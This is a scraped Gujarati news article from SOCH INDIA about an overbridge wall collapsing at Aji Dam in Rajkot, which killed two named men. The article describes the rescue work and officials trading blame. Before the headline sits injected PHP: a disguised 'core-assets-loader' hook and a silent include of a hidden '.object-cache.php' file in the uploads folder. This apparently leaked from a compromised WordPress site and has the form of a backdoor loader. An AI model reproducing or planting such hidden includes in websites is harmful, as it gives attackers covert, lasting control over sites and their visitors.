add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); આજી ડેમ ખાતે ઓવરબ્રિજની દીવાલ ધરાશયી, 2 લોકોના મોત, ઘટનાના CCTV ફૂટેજ સામે આવ્યાં – SOCH INDIA
Menu

देश
આજી ડેમ ખાતે ઓવરબ્રિજની દીવાલ ધરાશયી, 2 લોકોના મોત, ઘટનાના CCTV ફૂટેજ સામે આવ્યાં

nobanner

રાજકોટમાં મોટી દુર્ઘટના સર્જાઈ છે. આજી ડેમ ખાતે ઓવરબ્રિજની દીવાલ ધરાશયી થતા 2 લોકોના આ દુર્ઘટનામાં મોત થયા છે. હજુ પણ કેટલાક લોકો દટાયા હોવાની આશંકા છે. ફાયર અને પોલીસનો કાફલો ઘટનાસ્થળે પહોંચી ગયો છે.  આજી ડેમ સર્કલ પર ટ્રાફિક જામ થઈ ગયો છે.

આ દુર્ઘટનામાં ત્યાંથી પસાર થતા બે યુવાનોના મોત નિપજ્યા છે. પોલીસ અને ફાયર બ્રિગેડની ટીમોએ ત્યાં પહોંચીને દબાયેલા લોકોને તથા કાટમાળ ખસેડવાની કામગીરી હાથ ધરી. અત્રે જણાવવાનું કે આજે સવારથી જ રાજકોટમાં વરસાદ પડી રહ્યો છે. વર્ષ 2008માં બનાવવામાં આવેલી આ દીવાલ હાલ ધરાશયી થઈ ગઈ. આ ઘટનાના સીસીટીવી ફૂટેજ પણ સામે આવ્યા છે. માત્ર 5 સેકન્ડમાં દીવાલ ધરાશયી થઈ હતી. પોલીસ દ્વારા રસ્તો બંધ કરી દેવાયો છે.

મનપાના અધિકારીઓ અને નેશનલ હાઈવે ઓથોરિટીના અધિકારીઓ હાલ તો આ ઘટના અંગે દોષનો ટોપલો એકબીજા પર ઢોળી રહ્યાં છે. દુર્ઘટના બાબતે ફાયર વિભાગ દ્વારા જણાવવામાં આવ્યું કે બે લોકોના મોત થયા છે. જ્યારે બે વાહનો દટાયા છે. જેને જેસીબીની મદદથી કાઢવામાં આવ્યાં. હજુ વધુ તપાસ ચાલુ છે. મળતી માહિતી મુજબ જે બે લોકોના મોત થયા છે તેમાંથી એક ભાવેશ ઉર્ફે ભૂપત નાથાભાઈ મિયાત્રા છે. મૃતકના પિતા કોર્પોરેશનના વિજિલન્સના Dyspના ડ્રાયવર છે. જ્યારે અન્ય મૃતકનું નામ વિજય કરણભાઈ વીરડા છે.